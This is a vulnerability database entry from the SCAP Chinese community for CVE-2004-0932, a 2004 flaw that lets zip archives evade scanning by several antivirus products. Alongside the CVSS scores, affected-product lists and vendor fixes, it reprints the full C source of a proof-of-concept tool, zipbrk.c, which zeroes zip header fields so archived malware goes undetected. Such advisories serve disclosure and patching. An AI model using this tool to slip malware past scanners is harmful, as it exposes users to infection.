CVE-2004-0932
CVSS7.5
发布时间 :2005-01-27 00:00:00
修订时间 :2008-09-05 16:39:50
NMCOEPS    

[原文]McAfee Anti-Virus Engine DATS drivers before 4398 released on Oct 13th 2004 and DATS Driver before 4397 October 6th 2004 allows remote attackers to bypass antivirus protection via a compressed file with both local and global headers set to zero, which does not prevent the compressed file from being opened on a target system.


[CNNVD]McAfee AntiVirus zip 绕过防病毒检测漏洞(CNNVD-200501-286)

        McAfee Anti-Virus是一款防病毒软件。
        McAfee Anti-Virus 引擎 (DATS 4398 released on Oct 13th 2004之前版本及 DATS Driver 4397 October 6th 2004之前版本)对zip文件处理存在问题,导致zip文件可绕过防病毒检测。
        攻击者可构造特殊对zip文件,将其local及global header均设置为0,即可绕过防病毒检测,而该zip文件可正常解压。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:mandrakesoft:mandrake_linux:10.1MandrakeSoft Mandrake Linux 10.1
cpe:/a:ca:etrust_intrusion_detection:1.4.1.13Computer Associates eTrust Intrusion Detection 1.4.1.13
cpe:/a:ca:etrust_antivirus:7.1Computer Associates eTrust Antivirus 7.1
cpe:/a:sophos:sophos_anti-virus:3.78dSophos Sophos Anti-Virus 3.78d
cpe:/a:rav_antivirus:rav_antivirus_for_file_servers:1.0
cpe:/a:sophos:sophos_puremessage_anti-virus:4.6
cpe:/o:mandrakesoft:mandrake_linux:10.1::x86_64
cpe:/a:sophos:sophos_anti-virus:3.84Sophos Sophos Anti-Virus 3.84
cpe:/a:sophos:sophos_anti-virus:3.82Sophos Sophos Anti-Virus 3.82
cpe:/a:ca:etrust_antivirus_gateway:7.0Computer Associates eTrust Antivirus Gateway 7.0
cpe:/o:suse:suse_linux:9.2SuSE SuSE Linux 9.2
cpe:/a:sophos:sophos_anti-virus:3.78Sophos Sophos Anti-Virus 3.78
cpe:/a:rav_antivirus:rav_antivirus_for_mail_servers:8.4.2
cpe:/a:sophos:sophos_anti-virus:3.86Sophos Sophos Anti-Virus 3.86
cpe:/a:ca:etrust_secure_content_manager:1.1Computer Associates eTrust Secure Content Manager 1.1
cpe:/a:rav_antivirus:rav_antivirus_desktop:8.6
cpe:/a:sophos:sophos_anti-virus:3.4.6Sophos Sophos Anti-Virus 3.4.6
cpe:/a:sophos:sophos_anti-virus:3.83Sophos Sophos Anti-Virus 3.83
cpe:/o:gentoo:linuxGentoo Linux
cpe:/a:sophos:sophos_small_business_suite:1.0
cpe:/a:kaspersky_lab:kaspersky_anti-virus:4.0
cpe:/a:ca:etrust_ez_antivirus:6.3Computer Associates eTrust EZ Antivirus 6.3
cpe:/a:ca:etrust_ez_antivirus:6.2Computer Associates eTrust EZ Antivirus 6.2
cpe:/a:ca:etrust_ez_armor:2.0Computer Associates eTrust EZ Armor 2.0
cpe:/a:sophos:sophos_anti-virus:3.80Sophos Sophos Anti-Virus 3.80
cpe:/a:mcafee:antivirus_engine:4.3.20McAfee McAfee Antivirus Engine 4.3.20
cpe:/a:ca:etrust_antivirus_gateway:7.1Computer Associates etrust Antivirus Gateway 7.1
cpe:/a:archive_zip:archive_zip:1.13
cpe:/a:ca:etrust_antivirus:7.0_sp2
cpe:/a:ca:inoculateit:6.0Computer Associates InoculateIT 6.0
cpe:/a:eset_software:nod32_antivirus:1.0.11
cpe:/a:eset_software:nod32_antivirus:1.0.13
cpe:/a:eset_software:nod32_antivirus:1.0.12
cpe:/a:ca:etrust_intrusion_detection:1.4.5Computer Associates eTrust Intrusion Detection 1.4.5
cpe:/a:ca:etrust_secure_content_manager:1.0Computer Associates eTrust Secure Content Manager 1.0
cpe:/a:ca:etrust_ez_armor:2.3Computer Associates eTrust EZ Armor 2.3
cpe:/a:ca:etrust_ez_antivirus:6.1Computer Associates eTrust EZ Antivirus 6.1
cpe:/a:ca:etrust_ez_armor:2.4Computer Associates eTrust EZ Armor 2.4
cpe:/a:ca:etrust_intrusion_detection:1.5Computer Associates eTrust Intrusion Detection 1.5
cpe:/a:ca:etrust_antivirus:7.0Computer Associates eTrust Antivirus 7.0
cpe:/a:sophos:sophos_anti-virus:3.81Sophos Sophos Anti-Virus 3.81
cpe:/a:ca:brightstor_arcserve_backup:11.1Computer Associates BrightStor ARCserve Backup 11.1
cpe:/o:gentoo:linux:1.4Gentoo Linux 1.4
cpe:/a:sophos:sophos_anti-virus:3.85Sophos Sophos Anti-Virus 3.85
cpe:/a:kaspersky_lab:kaspersky_anti-virus:5.0
cpe:/a:ca:etrust_secure_content_manager:1.0:sp1
cpe:/a:kaspersky_lab:kaspersky_anti-virus:3.0
cpe:/a:sophos:sophos_anti-virus:3.79Sophos Sophos Anti-Virus 3.79

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0932
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0932
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200501-286
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/11448
(VENDOR_ADVISORY)  BID  11448
http://xforce.iss.net/xforce/xfdb/17761
(VENDOR_ADVISORY)  XF  antivirus-zip-protection-bypass(17761)
http://www.idefense.com/application/poi/display?id=153&type=vulnerabilities&flashstatus=true
(UNKNOWN)  IDEFENSE  20041018 Multiple Vendor Anti-Virus Software Detection Evasion Vulnerability

- 漏洞信息

McAfee AntiVirus zip 绕过防病毒检测漏洞
高危 设计错误
2005-01-27 00:00:00 2006-12-21 00:00:00
远程  
        McAfee Anti-Virus是一款防病毒软件。
        McAfee Anti-Virus 引擎 (DATS 4398 released on Oct 13th 2004之前版本及 DATS Driver 4397 October 6th 2004之前版本)对zip文件处理存在问题,导致zip文件可绕过防病毒检测。
        攻击者可构造特殊对zip文件,将其local及global header均设置为0,即可绕过防病毒检测,而该zip文件可正常解压。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:
        http://www.mcafee.com/

- 漏洞信息 (629)

Multiple AntiVirus (zip file) Detection Bypass Exploit (EDBID:629)
multiple local
2004-11-14 Verified
0 oc192
N/A [点击下载]
/*
zipbrk.c - Proof-of-Concept for CAN-2004-0932 - CAN-2004-0937
Copyright (C) 2004 oc.192

This program is free software; you can redistribute it and/or modify it under the terms of the GNU
General Public License as published by the Free Software Foundation; either version 2 of the License,
or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program; if not,
write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.

oc.192 phreaker net
*/
#include <stdio.h>
#include <stdlib.h>

unsigned short LOCAL_HEADER_OFFSET = 16;
unsigned short CENTRAL_HEADER_OFFSET = 18;
unsigned long DATA_REPLACE_VALUE = 0x00000000;

void show_usage()
{
printf("zipbrk - by oc.192 [oc.192@phreaker.net]\n");
printf("Attempts to utilize the vulnerabilities described in:\n");
printf("CAN-2004-0932 - McAfee\nCAN-2004-0933 - Computer Associates\n"
"CAN-2004-0934 - Kaspersky\nCAN-2004-0937 - Sophos\n"
"CAN-2004-0935 - Eset\nCAN-2004-0936 - RAV\n\n");
printf(" Usage: zipbrk <zip_file>\n");
}

void patch_file(FILE *hfile, unsigned long offset)
{
char *buffer = malloc(1);

memset(buffer, 0, 1);
fseek(hfile, offset, SEEK_SET);
fwrite(buffer, 1, 1, hfile);
fwrite(buffer, 1, 1, hfile);
fwrite(buffer, 1, 1, hfile);
fwrite(buffer, 1, 1, hfile);
free(buffer);
}

void scan_file(char *filename)
{
FILE *hfile;
unsigned char buffer;
unsigned long offset = 0;

if ((hfile = fopen(filename, "rb+")) == NULL)
{
printf("[-] Error: Unable to open %s", filename);
return;
}
printf("[+] Scanning %s ...\n", filename);

while (fread(&buffer, sizeof(buffer), 1, hfile))
{
if (buffer == 0x50)
{
fread(&buffer, sizeof(buffer), 1, hfile);
if (buffer == 0x4B)
{
fread(&buffer, sizeof(buffer), 1, hfile);
if (buffer == 0x01)
{
fread(&buffer, sizeof(buffer), 1, hfile);
if (buffer == 0x02)
{
/* perform write */
offset = ftell(hfile);
offset = offset + LOCAL_HEADER_OFFSET;
printf(" [-] Writing local header patch [0x%.8X]\n", offset);
patch_file(hfile, offset);
fseek(hfile, offset, SEEK_SET);
}
}
else if (buffer == 0x03)
{
fread(&buffer, sizeof(buffer), 1, hfile);
if (buffer == 0x04)
{
/* perform write */
offset = ftell(hfile);
offset = offset + CENTRAL_HEADER_OFFSET;
printf(" [-] Writing central header patch [0x%.8X]\n", offset);
patch_file(hfile, offset);
fseek(hfile, offset, SEEK_SET);
}
}
}
}
}
printf("[+] File scanning finished. EOF:%d ERR:%d\n", feof(hfile), ferror(hfile));
fclose(hfile);
}

int main(int argc, char *argv[])
{
if (argc != 2)
{
show_usage();
return 0;
}

if (!strcmp(argv[1], "-h") || !strcmp(argv[1], "/?"))
{
show_usage();
return 0;
}

scan_file(argv[1]);

return 0;
}

// milw0rm.com [2004-11-14]
		

- 漏洞信息 (F35055)

zipbrk.zip (PacketStormID:F35055)
2004-11-20 00:00:00
oc.192  
exploit,local,virus
CVE-2004-0932,CVE-2004-0937
[点击下载]

This is a simple tool that searches for the central and local headers contained in a zip file and alters the uncompressed data variable to be 0 in an attempt to trick anti-virus software into not scanning the files inside the zip file.

- 漏洞信息

10963
Multiple Anti-Virus Zero Compressed Size Header Detection Bypass
Exploit Public Vendor Verified

- 漏洞描述

- 时间线

2004-10-18 2004-09-16
Unknow 2004-09-21

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Multiple Vendor Antivirus Software Zip Files Detection Evasion Vulnerability
Design Error 11448
Yes No
2004-10-18 12:00:00 2009-07-12 08:06:00
An anonymous researcher discovered this issue.

- 受影响的程序版本

Sophos Small Business Suite 1.0
+ Sophos Anti-Virus 3.85
+ Sophos Anti-Virus 3.84
+ Sophos Anti-Virus 3.83
+ Sophos Anti-Virus 3.82
+ Sophos Anti-Virus 3.81
+ Sophos Anti-Virus 3.80
Sophos PureMessage Anti-Virus 4.6
Sophos Anti-Virus 3.86
Sophos Anti-Virus 3.85
Sophos Anti-Virus 3.84
Sophos Anti-Virus 3.83
Sophos Anti-Virus 3.82
Sophos Anti-Virus 3.81
Sophos Anti-Virus 3.80
Sophos Anti-Virus 3.79
Sophos Anti-Virus 3.78 d
Sophos Anti-Virus 3.78
Sophos Anti-Virus 3.4.6
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
S.u.S.E. Linux Personal 9.2
RAV AntiVirus RAV AntiVirus for Mail Servers 8.4.2
RAV AntiVirus RAV AntiVirus for File Servers 1.0
RAV AntiVirus RAV AntiVirus Desktop 8.6
McAfee Antivirus Engine 4.3.20
Mandriva Linux Mandrake 10.1 x86_64
Mandriva Linux Mandrake 10.1
Kaspersky Labs Antivirus Scanning Engine 5.0
Kaspersky Labs Antivirus Scanning Engine 4.0
Kaspersky Labs Antivirus Scanning Engine 3.0
Gentoo Linux 1.4
Gentoo Linux
Eset Software NOD32 Antivirus 1.0 13
Eset Software NOD32 Antivirus 1.0 12
Eset Software NOD32 Antivirus 1.0 11
Computer Associates InoculateIT 6.0
- Caldera OpenLinux 2.4
- Debian Linux 2.2
- IBM AIX 4.3.3
- IBM AIX 4.3.2
- IBM AIX 4.3.1
- IBM AIX 4.3
- IBM AIX 4.2.1
- IBM AIX 4.2
- IBM AIX 4.1.5
- IBM AIX 4.1.4
- IBM AIX 4.1.3
- Mandriva Linux Mandrake 8.0
- Mandriva Linux Mandrake 7.2
- Mandriva Linux Mandrake 7.1
- RedHat Linux 7.1 i386
- RedHat Linux 7.0 i386
- RedHat Linux 6.2 i386
- S.u.S.E. Linux 7.1 x86
- S.u.S.E. Linux 7.0
- S.u.S.E. Linux 6.4
- SCO eDesktop 2.4
- SCO eServer 2.3.1
- SCO eServer 2.3
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
Computer Associates eTrust Secure Content Manager 1.1
Computer Associates eTrust Secure Content Manager 1.0 SP1
Computer Associates eTrust Secure Content Manager 1.0
Computer Associates eTrust Intrusion Detection 1.5
Computer Associates eTrust Intrusion Detection 1.4.5
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0
Computer Associates eTrust Intrusion Detection 1.4.1 .13
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0
Computer Associates eTrust EZ Armor 2.4
Computer Associates eTrust EZ Armor 2.3
Computer Associates eTrust EZ Armor 2.0
Computer Associates eTrust EZ Antivirus 6.3
Computer Associates eTrust EZ Antivirus 6.2
Computer Associates eTrust EZ Antivirus 6.1
Computer Associates eTrust Antivirus for the Gateway 7.1
Computer Associates eTrust Antivirus for the Gateway 7.0
Computer Associates eTrust Antivirus 7.1
Computer Associates eTrust Antivirus 7.0 SP2
Computer Associates eTrust Antivirus 7.0
Computer Associates BrightStor ARCServe Backup for Windows 11.1
Archive::Zip Archive::Zip 1.13
Archive::Zip Archive::Zip 1.14

- 不受影响的程序版本

Archive::Zip Archive::Zip 1.14

- 漏洞讨论

Multiple Vendor Antivirus applications are reported vulnerable to a zip file detection evasion vulnerability. This vulnerability may allow maliciously crafted zip files to avoid being scanned and detected.

A remote attacker can craft a malicious zip archive and send it a vulnerable user. The malicious archive can bypass the protection provided by a vulnerable antivirus program, giving users a false sense of security. If the user opens and executes the file, this attack can result in a malicious code infection.

This issue is reported to affected products offered by McAfee, Computer Associates, Kaspersky, Sophos, Eset and RAV.

Latest antivirus products by Symantec, Bitdefender, Trend Micro and Panda are not vulnerable to this issue.

- 漏洞利用

An exploit is not required.

A proof of concept exploit targeting multiple products is available:

- 解决方案

Various vendors have released updates and corrected this issue. Other vendors are reported to release fixes in the near future. Please see references and contact the vendor for more information.

Gentoo Linux has released an advisory (GLSA 200410-31) that fixes the Archive-Zip package and apparently resolves this issue. Gentoo Linux advises that all Archive::Zip users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-perl/Archive-Zip-1.14"

For more information please see the referenced Gentoo Linux advisory.

Mandrake Linux has released an advisory (MDKSA-2004:118) dealing with this issue in their perls Archive::Zip package. Please see the referenced advisory for more information.

SuSE Linux has released a fixed version of perls Archive::Zip module to resolve this issue.


Computer Associates eTrust Secure Content Manager 1.0

Computer Associates eTrust Secure Content Manager 1.0 SP1

Computer Associates eTrust Secure Content Manager 1.1

Archive::Zip Archive::Zip 1.13

Computer Associates eTrust Intrusion Detection 1.4.1 .13

Computer Associates eTrust Intrusion Detection 1.4.5

Computer Associates eTrust Intrusion Detection 1.5

Mandriva Linux Mandrake 10.1

Mandriva Linux Mandrake 10.1 x86_64

Computer Associates eTrust EZ Armor 2.0

Computer Associates eTrust EZ Armor 2.3

Computer Associates eTrust EZ Armor 2.4

McAfee Antivirus Engine 4.3.20

Computer Associates InoculateIT 6.0

Computer Associates eTrust EZ Antivirus 6.1

Computer Associates eTrust EZ Antivirus 6.2

Computer Associates eTrust EZ Antivirus 6.3

Computer Associates eTrust Antivirus for the Gateway 7.0

Computer Associates eTrust Antivirus 7.0

Computer Associates eTrust Antivirus 7.1

Computer Associates eTrust Antivirus for the Gateway 7.1

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站